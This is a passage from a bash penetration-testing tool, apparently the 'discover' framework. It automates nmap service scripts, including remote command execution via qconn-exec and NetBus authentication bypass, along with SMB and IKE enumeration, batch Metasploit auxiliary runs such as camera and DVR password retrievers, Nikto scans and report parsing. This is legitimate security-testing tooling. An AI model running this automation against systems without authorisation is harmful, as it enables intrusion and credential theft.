nmap -iL $name/7634.txt -Pn -n --open -p7634 --script-timeout 1m --script=hddtemp-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-7634.txt
fi
if [[ -e $name/8000.txt ]]; then
echo " QNX QCONN"
nmap -iL $name/8000.txt -Pn -n --open -p8000 --script-timeout 1m --script=qconn-exec --script-args=qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8000.txt
fi
if [[ -e $name/8009.txt ]]; then
echo " AJP"
nmap -iL $name/8009.txt -Pn -n --open -p8009 --script-timeout 1m --script=ajp-methods,ajp-request --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8009.txt
fi
if [[ -e $name/8081.txt ]]; then
echo " McAfee ePO"
nmap -iL $name/8081.txt -Pn -n --open -p8081 --script-timeout 1m --script=mcafee-epo-agent --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8081.txt
fi
if [[ -e $name/8091.txt ]]; then
echo " CouchBase Web Administration"
nmap -iL $name/8091.txt -Pn -n --open -p8091 --script-timeout 1m --script=membase-http-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8091.txt
fi
if [[ -e $name/8140.txt ]]; then
echo " Puppet"
nmap -iL $name/8140.txt -Pn -n --open -p8140 --script-timeout 1m --script=puppet-naivesigning --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8140.txt
fi
if [[ -e $name/bitcoin.txt ]]; then
echo " Bitcoin"
nmap -iL $name/bitcoin.txt -Pn -n --open -p8332,8333 --script-timeout 1m --script=bitcoin-getaddr,bitcoin-info,bitcoinrpc-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-bitcoin.txt
fi
if [[ -e $name/9100.txt ]]; then
echo " Lexmark"
nmap -iL $name/9100.txt -Pn -n --open -p9100 --script-timeout 1m --script=lexmark-config --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9100.txt
fi
if [[ -e $name/9160.txt ]]; then
echo " Cassandra"
nmap -iL $name/9160.txt -Pn -n --open -p9160 --script-timeout 1m --script=cassandra-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9160.txt
fi
if [[ -e $name/9600.txt ]]; then
echo " FINS"
nmap -iL $name/9600.txt -Pn -n --open -p9600 --script-timeout 1m --script=omron-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9600.txt
fi
if [[ -e $name/9999.txt ]]; then
echo " Java Debug Wire Protocol"
nmap -iL $name/9999.txt -Pn -n --open -p9999 --script-timeout 1m --script=jdwp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9999.txt
fi
if [[ -e $name/10000.txt ]]; then
echo " Network Data Management"
nmap -iL $name/10000.txt -Pn -n --open -p10000 --script-timeout 1m --script=ndmp-fs-info,ndmp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-10000.txt
fi
if [[ -e $name/11211.txt ]]; then
echo " Memory Object Caching"
nmap -iL $name/11211.txt -Pn -n --open -p11211 --script-timeout 1m --script=memcached-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-11211.txt
fi
if [[ -e $name/12000.txt ]]; then
echo " CCcam"
nmap -iL $name/12000.txt -Pn -n --open -p12000 --script-timeout 1m --script=cccam-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-12000.txt
fi
if [[ -e $name/12345.txt ]]; then
echo " NetBus"
nmap -iL $name/12345.txt -Pn -n --open -p12345 --script-timeout 1m --script=netbus-auth-bypass,netbus-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-12345.txt
fi
if [[ -e $name/17185.txt ]]; then
echo " VxWorks"
nmap -iL $name/17185.txt -Pn -n -sU --open -p17185 --script-timeout 1m --script=wdb-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-17185.txt
fi
if [[ -e $name/19150.txt ]]; then
echo " GKRellM"
nmap -iL $name/19150.txt -Pn -n --open -p19150 --script-timeout 1m --script=gkrellm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-19150.txt
fi
if [[ -e $name/27017.txt ]]; then
echo " MongoDB"
nmap -iL $name/27017.txt -Pn -n --open -p27017 --script-timeout 1m --script=mongodb-databases,mongodb-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-27017.txt
fi
if [[ -e $name/31337.txt ]]; then
echo " BackOrifice"
nmap -iL $name/31337.txt -Pn -n -sU --open -p31337 --script-timeout 1m --script=backorifice-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-31337.txt
fi
if [[ -e $name/35871.txt ]]; then
echo " Flume"
nmap -iL $name/35871.txt -Pn -n --open -p35871 --script-timeout 1m --script=flume-master-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-35871.txt
fi
if [[ -e $name/44818.txt ]]; then
echo " EtherNet/IP"
nmap -iL $name/44818.txt -Pn -n -sU --open -p44818 --script-timeout 1m --script=enip-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-44818.txt
fi
if [[ -e $name/47808.txt ]]; then
echo " BACNet"
nmap -iL $name/47808.txt -Pn -n -sU --open -p47808 --script-timeout 1m --script=bacnet-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-47808.txt
fi
if [[ -e $name/49152.txt ]]; then
echo " Supermicro"
nmap -iL $name/49152.txt -Pn -n --open -p49152 --script-timeout 1m --script=supermicro-ipmi-conf --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-49152.txt
fi
if [[ -e $name/50000.txt ]]; then
echo " DRDA"
nmap -iL $name/50000.txt -Pn -n --open -p50000 --script-timeout 1m --script=drda-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-50000.txt
fi
if [[ -e $name/hadoop.txt ]]; then
echo " Hadoop"
nmap -iL $name/hadoop.txt -Pn -n --open -p50030,50060,50070,50075,50090 --script-timeout 1m --script=hadoop-datanode-info,hadoop-jobtracker-info,hadoop-namenode-info,hadoop-secondary-namenode-info,hadoop-tasktracker-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-hadoop.txt
fi
if [[ -e $name/apache-hbase.txt ]]; then
echo " Apache HBase"
nmap -iL $name/apache-hbase.txt -Pn -n --open -p60010,60030 --script-timeout 1m --script=hbase-master-info,hbase-region-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-apache-hbase.txt
fi
rm tmp*
for x in $name/./script*; do
if grep '|' $x > /dev/null 2>&1; then
echo > /dev/null 2>&1
else
rm $x > /dev/null 2>&1
fi
done
##############################################################################################################
# Additional tools
if [[ -e $name/161.txt ]]; then
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i $name/161.txt > $name/onesixtyone.txt
fi
if [ -e $name/445.txt ] || [ -e $name/500.txt ]; then
echo
echo $medium
echo
echo -e "${BLUE}Running additional tools.${NC}"
fi
# SMB: run enum4linux against every host with 445 open and keep only the
# informative output lines.
if [[ -e $name/445.txt ]]; then
echo " enum4linux"
for i in $(cat $name/445.txt); do
# BUG FIX: the filter previously contained the bracket expression [E],
# which matches ANY line containing a capital E and discarded nearly all
# output; \[E\] matches the literal "[E]" error tag enum4linux emits.
enum4linux -a $i | egrep -v "(Can't determine|enum4linux|Looking up status|No printers|No reply from|unknown|\[E\])" > tmp
cat -s tmp >> $name/script-enum4linux.txt
done
fi
if [[ -e $name/445.txt ]]; then
echo " smbclient"
for i in $(cat $name/445.txt); do
echo $i >> $name/script-smbclient.txt
smbclient -L $i -N | grep -v 'failed' >> $name/script-smbclient.txt 2>/dev/null
echo >> $name/script-smbclient.txt
done
fi
# IKE/ISAKMP: fingerprint VPN endpoints on hosts with UDP 500 open.
if [[ -e $name/500.txt ]]; then
echo " ike-scan"
# BUG FIX: the loop previously iterated over $name/445.txt (the SMB host
# list) even though this branch is gated on $name/500.txt; ike-scan was
# being aimed at the wrong hosts.
for i in $(cat $name/500.txt); do
ike-scan -f $i >> $name/script-ike-scan.txt
done
fi
rm tmp 2>/dev/null
}
##############################################################################################################
f_metasploit(){
# Offer to run the Metasploit auxiliary modules that match the discovered
# services; anything other than an exact "y" skips straight to the report.
echo
echo $medium
echo
echo -ne "${YELLOW}Run matching Metasploit auxiliaries? (y/N) ${NC}"
read msf
case $msf in
y) f_run-metasploit ;;
*) f_report ;;
esac
}
##############################################################################################################
f_run-metasploit(){
# Build a single Metasploit resource script (/tmp/master) from the per-port
# resource templates that match the open-port lists under $name, run it
# through msfconsole, then export the workspace and clean the spooled output.
echo
echo -e "${BLUE}Starting Postgres.${NC}"
service postgresql start
echo
echo -e "${BLUE}Starting Metasploit.${NC}"
echo
echo -e "${BLUE}Using the following resource files.${NC}"
cp -R $discover/resource/ /tmp/
echo workspace -a $name > /tmp/master
# BUG FIX: this line previously used '>' and truncated /tmp/master,
# silently discarding the workspace command written just above.
echo spool tmpmsf >> /tmp/master
# For every open-port list found in $name, point the matching resource
# template at it and append the template to the master script.
# Record format: <ports-file basename> <resource template> <console label>
while read -r file rc label; do
if [[ -e $name/$file.txt ]]; then
echo " $label"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name/$file.txt|g" /tmp/resource/$rc
cat /tmp/resource/$rc >> /tmp/master
fi
done << 'EOF'
19 19-chargen.rc Chargen Probe Utility
21 21-ftp.rc FTP
22 22-ssh.rc SSH
23 23-telnet.rc Telnet
25 25-smtp.rc SMTP
69 69-tftp.rc TFTP
79 79-finger.rc Finger
110 110-pop3.rc POP3
111 111-rpc.rc RPC
123 123-udp-ntp.rc NTP
135 135-dcerpc.rc DCE/RPC
137 137-udp-netbios.rc NetBIOS
143 143-imap.rc IMAP
161 161-udp-snmp.rc SNMP
407 407-udp-motorola.rc Motorola
443 443-vmware.rc VMware
445 445-smb.rc SMB
465 465-smtp.rc SMTP/S
502 502-scada.rc SCADA Modbus Client Utility
512 512-rexec.rc Rexec
513 513-rlogin.rc rlogin
514 514-rshell.rc rshell
523 523-udp-db2.rc db2
548 548-afp.rc AFP
623 623-udp-ipmi.rc IPMI
771 771-scada.rc SCADA Digi
831 831-easycafe.rc EasyCafe Server Remote File Access
902 902-vmware.rc VMware
998 998-zenworks.rc Novell ZENworks Configuration Management Preboot Service Remote File Access
1099 1099-rmi.rc RMI Registery
1158 1158-oracle.rc Oracle
1433 1433-mssql.rc MS-SQL
1521 1521-oracle.rc Oracle
1604 1604-udp-citrix.rc Citrix
1720 1720-h323.rc H323
1900 1900-udp-upnp.rc UPnP
2049 2049-nfs.rc NFS
2362 2362-udp-scada.rc SCADA Digi
3000 3000-emc.rc EMC
3050 3050-borland.rc Borland InterBase Services Manager Information
3306 3306-mysql.rc MySQL
3310 3310-clamav.rc ClamAV
3389 3389-rdp.rc RDP
3500 3500-emc.rc EMC
4800 4800-udp-moxa.rc Moxa
5000 5000-satel.rc Satel
5040 5040-dcerpc.rc DCE/RPC
5060 5060-udp-sip.rc SIP UDP
5060-tcp 5060-sip.rc SIP
5432 5432-postgres.rc Postgres
5560 5560-oracle.rc Oracle iSQL
5631 5631-pcanywhere.rc pcAnywhere
5632 5632-pcanywhere.rc pcAnywhere
5900 5900-vnc.rc VNC
5920 5920-cctv.rc CCTV DVR
5984 5984-couchdb.rc CouchDB
5985 5985-winrm.rc winrm
x11 6000-5-x11.rc x11
6379 6379-redis.rc Redis
7777 7777-backdoor.rc Backdoor
8000 8000-canon.rc Canon
8080 8080-tomcat.rc Tomcat
8080 8080-oracle.rc Oracle
8222 8222-vmware.rc VMware
8400 8400-adobe.rc Adobe
8834 8834-nessus.rc Nessus
9000 9000-sharp.rc Sharp DVR Password Retriever
9084 9084-vmware.rc VMware
9100 9100-printers.rc Printers
9999 9999-telnet.rc Telnet
13364 13364-rosewill.rc Rosewill RXS-3211 IP Camera Password Retriever
17185 17185-udp-vxworks.rc VxWorks
28784 28784-scada.rc SCADA Koyo DirectLogic PLC
30718 30718-telnet.rc Telnet
37777 37777-dahua-dvr.rc Dahua DVR
46824 46824-scada.rc SCADA Sielco Sistemi
50000 50000-db2.rc db2
EOF
echo db_export -f xml -a $name/metasploit.xml >> /tmp/master
echo exit >> /tmp/master
x=$(wc -l /tmp/master | cut -d ' ' -f1)
# The baseline master script is 4 lines (workspace, spool, db_export, exit);
# exactly 4 means no matching services were found, so skip the msfconsole run.
# (Was '-eq 3', which matched the truncated file produced by the '>' bug above.)
if [ $x -eq 4 ]; then
echo 2>/dev/null
else
echo
sed 's/\/\//\//g' /tmp/master > $name/master.rc
msfdb init
msfconsole -r $name/master.rc
# Strip module noise and status chatter from the spooled console output.
cat tmpmsf | egrep -iv "(> exit|> run|% complete|Attempting to extract|Authorization not requested|Checking if file|completed|Connecting to the server|Connection reset by peer|data_connect failed|db_export|did not reply|does not appear|doesn't exist|Finished export|Handshake failed|ineffective|It doesn't seem|Login Fail|negotiation failed|NoMethodError|No relay detected|no response|No users found|not be identified|not found|NOT VULNERABLE|Providing some time|request timeout|responded with error|RPORT|RHOSTS|Scanning for vulnerable|Shutting down the TFTP|Spooling|Starting export|Starting TFTP server|Starting VNC login|THREADS|Timed out after|timed out|Trying to acquire|Unable to|unknown state)" > $name/metasploit.txt
rm $name/master.rc
rm tmpmsf
fi
}
##############################################################################################################
f_enumerate(){
# Re-run the enumeration scripts against a previously completed scan folder,
# then hand off to Metasploit and print a completion summary.
clear
f_banner
f_typeofscan
echo -n "Enter the location of your previous scan: "
read -e location
# Check for no answer
if [[ -z $location ]]; then
f_error
fi
# Check for wrong answer (quoted so a path containing spaces cannot break
# the test or pass a bogus extra operand)
if [ ! -d "$location" ]; then
f_error
fi
name=$location
echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay
# Check for no answer
if [[ -z $delay ]]; then
delay='0'
fi
# BUG FIX: the previous integer tests ([ $delay -lt 0 ] || [ $delay -gt 5 ])
# blew up on non-numeric input and then fell through, accepting the bad
# value; only a single digit 0-5 is valid.
if ! [[ $delay =~ ^[0-5]$ ]]; then
f_error
fi
f_scripts
echo
echo $medium
f_run-metasploit
echo
echo -e "${BLUE}Stopping Postgres.${NC}"
service postgresql stop
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$name${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_report(){
END=$(date +%r\ %Z)
filename=$name/report.txt
host=$(wc -l $name/hosts.txt | cut -d ' ' -f1)
echo "Nmap Report" > $filename
date +%A" - "%B" "%d", "%Y >> $filename
echo >> $filename
echo "Start time $START" >> $filename
echo "Finish time $END" >> $filename
echo "Scanner IP $ip" >> $filename
echo >> $filename
echo $medium >> $filename
echo >> $filename
if [ -e $name/script-smbvulns.txt ]; then
echo "May be vulnerable to MS08-067 & more." >> $filename
echo >> $filename
cat $name/script-smbvulns.txt >> $filename
echo >> $filename
echo $medium >> $filename
echo >> $filename
fi
echo "Hosts Discovered ($host)" >> $filename
echo >> $filename
cat $name/hosts.txt >> $filename 2>/dev/null
echo >> $filename
if [[ ! -s $name/ports.txt ]]; then
rm -rf "$name" tmp*
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "${YELLOW}No hosts found with open ports.${NC}"
echo
echo
exit
else
ports=$(wc -l $name/ports.txt | cut -d ' ' -f1)
fi
echo $medium >> $filename
echo >> $filename
echo "Open Ports ($ports)" >> $filename
echo >> $filename
if [ -s $name/ports-tcp.txt ]; then
echo "TCP Ports" >> $filename
cat $name/ports-tcp.txt >> $filename
echo >> $filename
fi
if [ -s $name/ports-udp.txt ]; then
echo "UDP Ports" >> $filename
cat $name/ports-udp.txt >> $filename
echo >> $filename
fi
echo $medium >> $filename
if [ -e $name/banners.txt ]; then
banners=$(wc -l $name/banners.txt | cut -d ' ' -f1)
echo >> $filename
echo "Banners ($banners)" >> $filename
echo >> $filename
cat $name/banners.txt >> $filename
echo >> $filename
echo $medium >> $filename
fi
echo >> $filename
echo "High Value Hosts by Port" >> $filename
echo >> $filename
HVPORTS="13 19 21 22 23 25 37 53 67 69 70 79 80 102 110 111 119 123 135 137 139 143 161 389 407 433 443 445 465 500 502 512 513 514 523 524 548 554 563 587 623 631 636 771 831 873 902 993 995 998 1050 1080 1099 1158 1344 1352 1433 1434 1521 1604 1720 1723 1883 1900 1911 1962 2049 2202 2302 2362 2375 2628 2947 3000 3031 3050 3260 3306 3310 3389 3478 3500 3632 3671 4369 4800 5019 5040 5060 5353 5432 5560 5631 5632 5666 5672 5683 5850 5900 5920 5984 5985 6000 6001 6002 6003 6004 6005 6379 6481 6666 7210 7634 7777 8000 8009 8080 8081 8091 8140 8222 8332 8333 8400 8443 8834 9000 9084 9100 9160 9600 9999 10000 11211 12000 12345 13364 17185 19150 27017 28784 30718 31337 35871 37777 44818 46824 47808 49152 50000 50030 50060 50070 50075 50090 60010 60030"
for i in $HVPORTS; do
if [[ -e $name/$i.txt ]]; then
echo "Port $i" >> $filename
cat $name/$i.txt >> $filename
echo >> $filename
fi
done
echo $medium >> $filename
echo >> $filename
cat $name/nmap.txt >> $filename
echo $medium >> $filename
echo $medium >> $filename
echo >> $filename
echo "Nmap Scripts" >> $filename
SCRIPTS="script-13 script-21 script-22 script-23 script-smtp script-37 script-53 script-67 script-70 script-79 script-102 script-110 script-111 script-nntp script-123 script-137 script-139 script-143 script-161 script-389 script-443 script-445 script-500 script-523 script-524 script-548 script-554 script-623 script-631 script-636 script-873 script-993 script-995 script-1050 script-1080 script-1099 script-1344 script-1352 script-1433 script-1434 script-1521 script-1604 script-1723 script-1883 script-1911 script-1962 script-2049 script-2202 script-2302 script-2375 script-2628 script-2947 script-3031 script-3260 script-3306 script-3310 script-3389 script-3478 script-3632 script-3671 script-4369 script-5019 script-5060 script-5353 script-5666 script-5672 script-5683 script-5850 script-5900 script-5984 script-x11 script-6379 script-6481 script-6666 script-7210 script-7634 script-8000 script-8009 script-8081 script-8091 script-8140 script-bitcoin script-9100 script-9160 script-9600 script-9999 script-10000 script-11211 script-12000 script-12345 script-17185 script-19150 script-27017 script-31337 script-35871 script-44818 script-47808 script-49152 script-50000 script-hadoop script-apache-hbase"
for i in $SCRIPTS; do
if [[ -e $name/"$i.txt" ]]; then
cat $name/"$i.txt" >> $filename
echo $medium >> $filename
fi
done
if [ -e $name/script-enum4linux.txt ] || [ -e $name/script-smbclient.txt ] || [ -e $name/ike-scan.txt ]; then
echo $medium >> $filename
echo >> $filename
echo "Additional Enumeration" >> $filename
if [ -e $name/script-enum4linux.txt ]; then
cat $name/script-enum4linux.txt >> $filename
echo $medium >> $filename
echo >> $filename
fi
if [ -e $name/script-smbclient.txt ]; then
cat $name/script-smbclient.txt >> $filename
echo $medium >> $filename
fi
if [ -e $name/script-ike-scan.txt ]; then
cat $name/script-ike-scan.txt >> $filename
echo $medium >> $filename
fi
fi
mv $name $home/data/
START=0
END=0
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/$name/report.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
# Check URLs copied from an authenticated Burp session for pages that are
# still reachable without authentication (Insecure Direct Object References).
# Writes one "HTTP-code - URL" line per target to $home/data/DirectObjectRef.txt.
f_directObjectRef(){
clear
f_banner
echo -e "${BLUE}Using Burp, authenticate to a site, map & Spider, then log out.${NC}"
echo -e "${BLUE}Target > Site map > select the URL > right click > Copy URLs in this host.${NC}"
echo -e "${BLUE}Paste the results into a new file.${NC}"
f_location
# Read line-by-line instead of word-splitting $(cat ...) so URLs containing
# spaces or shell metacharacters reach curl intact.
while read -r url; do
curl -sk -w "%{http_code} - %{url_effective} \\n" "$url" -o /dev/null 2>&1 | tee -a tmp
done < "$location"
# Deduplicate and write the report directly into the data directory.
sort -u tmp > $home/data/DirectObjectRef.txt
rm tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/DirectObjectRef.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
# Open one browser tab per target, either from a user-supplied list (option 1,
# optionally over HTTPS) or from the Disallow entries of a domain's robots.txt
# (option 2). Option 2 saves the discovered paths to $home/data/$domain-robots.txt.
f_multitabs(){
f_runlocally
clear
f_banner
echo -e "${BLUE}Open multiple tabs in $browser with:${NC}"
echo
echo "1. List"
echo "2. Directories from a domain's robots.txt."
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) f_location
echo -n "Use SSL? (y/N) "
read ssl
# Launch the browser first so the per-target invocations open as tabs in it.
$web &
sleep 2
# Quote "$ssl": an unquoted empty or multi-word answer breaks the test.
if [ -z "$ssl" ]; then
while read -r i; do
$web http://$i &
sleep 1
done < "$location"
elif [ "$ssl" == "y" ]; then
while read -r i; do
$web https://$i &
sleep 1
done < "$location"
else
f_error
fi
;;
2)
echo
echo $medium
echo
echo "Usage: target.com or target-IP"
echo
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
# Check for OS X - third-party wget lives under /usr/local/bin there
if [[ `uname` == 'Darwin' ]]; then
/usr/local/bin/wget -q $domain/robots.txt
else
wget -q $domain/robots.txt
fi
# Check if the file is empty
if [ ! -s robots.txt ]; then
echo
echo -e "${RED}$medium${NC}"
echo
echo -e "${RED}                     *** No robots file discovered. ***${NC}"
echo
echo -e "${RED}$medium${NC}"
sleep 2
f_main
fi
# Extract each disallowed path, then open every one in a new tab.
grep 'Disallow' robots.txt | awk '{print $2}' > tmp
$web &
sleep 2
while read -r i; do
$web http://$domain$i &
sleep 1
done < tmp
rm robots.txt
mv tmp $home/data/$domain-robots.txt
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/$domain-robots.txt${NC}\n"
echo
echo
exit
;;
3) f_main;;
*) f_error;;
esac
}
##############################################################################################################
# Run one Nikto scan per target, each in its own terminal tab driven by
# xdotool. Option 1 takes a list of IPs plus a single port (reports go to
# $home/data/nikto-$port/); option 2 takes IP:port pairs (reports go to
# $home/data/nikto/).
f_nikto(){
f_runlocally
clear
f_banner
echo -e "${BLUE}Run multiple instances of Nikto in parallel.${NC}"
echo
echo "1. List of IPs."
echo "2. List of IP:port."
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
f_location
echo
echo -n "Port (default 80): "
read port
echo
# Check if port is a number
echo "$port" | grep -E "^[0-9]+$" 2>/dev/null
isnum=$?
if [ $isnum -ne 0 ] && [ ${#port} -gt 0 ]; then
f_error
fi
# Default to port 80 when no answer is given.
if [ ${#port} -eq 0 ]; then
port=80
fi
if [ $port -lt 1 ] || [ $port -gt 65535 ]; then
f_error
fi
# -p avoids an error when the directory is left over from a previous run.
mkdir -p $home/data/nikto-$port
reportdir=$home/data/nikto-$port
while read -r line; do
xdotool key ctrl+shift+t
xdotool type "nikto -h $line -port $port -Format htm --output $home/data/nikto-$port/$line.htm ; exit"
sleep 1
xdotool key Return
done < "$location"
;;
2)
f_location
mkdir -p $home/data/nikto
reportdir=$home/data/nikto
while IFS=: read -r host port; do
xdotool key ctrl+shift+t
sleep 1
xdotool type "nikto -h $host -port $port -Format htm --output $home/data/nikto/$host-$port.htm ; exit"
sleep 1
xdotool key Return
done < "$location"
;;
3) f_main;;
*) f_error;;
esac
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
# Report the directory actually used (nikto-$port for option 1, nikto for
# option 2) instead of hard-coding one of them.
echo -e "The new report is located at ${YELLOW}$reportdir/${NC}\n"
echo
echo
exit
}
##############################################################################################################
# Parse scanner XML exports (Burp, Nessus, Nexpose, Nmap, Qualys) into CSV
# reports saved under $home/data, using the helper scripts in parsers/.
f_parse(){
clear
f_banner
echo -e "${BLUE}Parse XML to CSV.${NC}"
echo
echo "1. Burp (Base64)"
echo "2. Nessus (.nessus)"
echo "3. Nexpose (XML 2.0)"
echo "4. Nmap"
echo "5. Qualys"
echo "6. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
# Burp Suite items export (Base64-encoded requests/responses).
1)
f_location
parsers/parse-burp.py $location
mv burp.csv $home/data/burp-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/burp-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
# Nessus v2 (.nessus) export. The egrep chains below strip informational
# plugins so the final CSV contains only actionable findings.
2)
f_location
parsers/parse-nessus.py $location
# Delete findings with a solution of n/a
grep -v 'n/a' nessus.csv > tmp.csv
# Delete findings with CVSS score of 0 and solution of n/a
egrep -v "(Adobe Acrobat Detection|Adobe Extension Manager Installed|Adobe Flash Player for Mac Installed|Adobe Flash Professional Detection|Adobe Illustrator Detection|Adobe Photoshop Detection|Adobe Reader Detection|Adobe Reader Installed \(Mac OS X\)|ADSI Settings|Advanced Message Queuing Protocol Detection|AJP Connector Detection|AirWatch API Settings|Antivirus Software Check|Apache Axis2 Detection|Apache HTTP Server HttpOnly Cookie Information Disclosure|Apple Filing Protocol Server Detection|Apple Profile Manager API Settings|AppSocket & socketAPI Printers - Do Not Scan|Appweb HTTP Server Version|ASG-Sentry SNMP Agent Detection|Authenticated Check: OS Name and Installed Package Enumeration|Autodesk AutoCAD Detection|Backported Security Patch Detection \(FTP\)|Backported Security Patch Detection \(SSH\)|Authenticated Check: OS Name and Installed Package Enumeration|Backported Security Patch Detection \(WWW\)|BACnet Protocol Detection|BIOS Version Information \(via SMB\)|BIOS Version \(WMI\)|Blackboard Learn Detection|Broken Web Servers|CA Message Queuing Service Detection|CDE Subprocess Control Service \(dtspcd\) Detection|Check Point FireWall-1 ICA Service Detection|Check Point SecuRemote Hostname Information Disclosure|Cisco AnyConnect Secure Mobility Client Detection|CISCO ASA SSL VPN Detection|Cisco TelePresence Multipoint Control Unit Detection|Cleartext protocols settings|COM+ Internet Services (CIS) Server Detection|Common Platform Enumeration \(CPE\)|Computer Manufacturer Information \(WMI\)|CORBA IIOP Listener Detection|Database settings|DB2 Administration Server Detection|DB2 Discovery Service Detection|DCE Services Enumeration|Dell OpenManage Web Server Detection|Derby Network Server Detection|Detect RPC over TCP|Device Hostname|Device Type|DNS Sender Policy Framework \(SPF\) Enabled|DNS Server DNSSEC Aware Resolver|DNS Server Fingerprinting|DNS Server Version Detection|Do not scan fragile devices|EMC SMARTS Application Server Detection|Erlang Port 
Mapper Daemon Detection|Ethernet Card Manufacturer Detection|External URLs|FileZilla Client Installed|firefox Installed \(Mac OS X\)|Firewall Rule Enumeration|Flash Player Detection|FTP Service AUTH TLS Command Support|FTP Server Detection|Global variable settings|Good MDM Settings|Google Chrome Detection \(Windows\)|Google Chrome Installed \(Mac OS X\)|Google Picasa Detection \(Windows\)|Host Fully Qualified Domain Name \(FQDN\) Resolution|HMAP Web Server Fingerprinting|Hosts File Whitelisted Entries|HP Data Protector Components Version Detection|HP OpenView BBC Service Detection|HP SiteScope Detection|HSTS Missing From HTTPS Server|HTTP cookies import|HTTP Cookie 'secure' Property Transport Mismatch|HTTP login page|HTTP Methods Allowed \(per directory\)|HTTP Proxy Open Relay Detection|HTTP Reverse Proxy Detection|HTTP Server Cookies Set|HTTP Server Type and Version|HTTP TRACE \/ TRACK Methods Allowed|HTTP X-Frame-Options Response Header Usage|Hyper-V Virtual Machine Detection|HyperText Transfer Protocol \(HTTP\) Information|IBM Domino Detection \(uncredentialed check\)|IBM Domino Installed|IBM GSKit Installed|IBM iSeries Credentials|IBM Lotus Notes Detection|IBM Notes Client Detection|IBM Remote Supervisor Adapter Detection \(HTTP\)|IBM Tivoli Endpoint Manager Client Detection|IBM Tivoli Endpoint Manager Web Server Detection|IBM Tivoli Storage Manager Client Installed|IBM Tivoli Storage Manager Service Detection|IBM WebSphere Application Server Detection|IMAP Service Banner Retrieval|IMAP Service STARTTLS Command Support|IP Protocols Scan|IPMI Cipher Suites Supported|IPMI Versions Supported|iTunes Version Detection \(credentialed check\)|Kerberos configuration|Kerberos Information Disclosure|L2TP Network Server Detection|LDAP Server Detection|LDAP Crafted Search Request Server Information Disclosure|LDAP Service STARTTLS Command Support|LibreOffice Detection|Login configurations|Lotus Sametime Detection|MacOSX Cisco AnyConnect Secure Mobility Client 
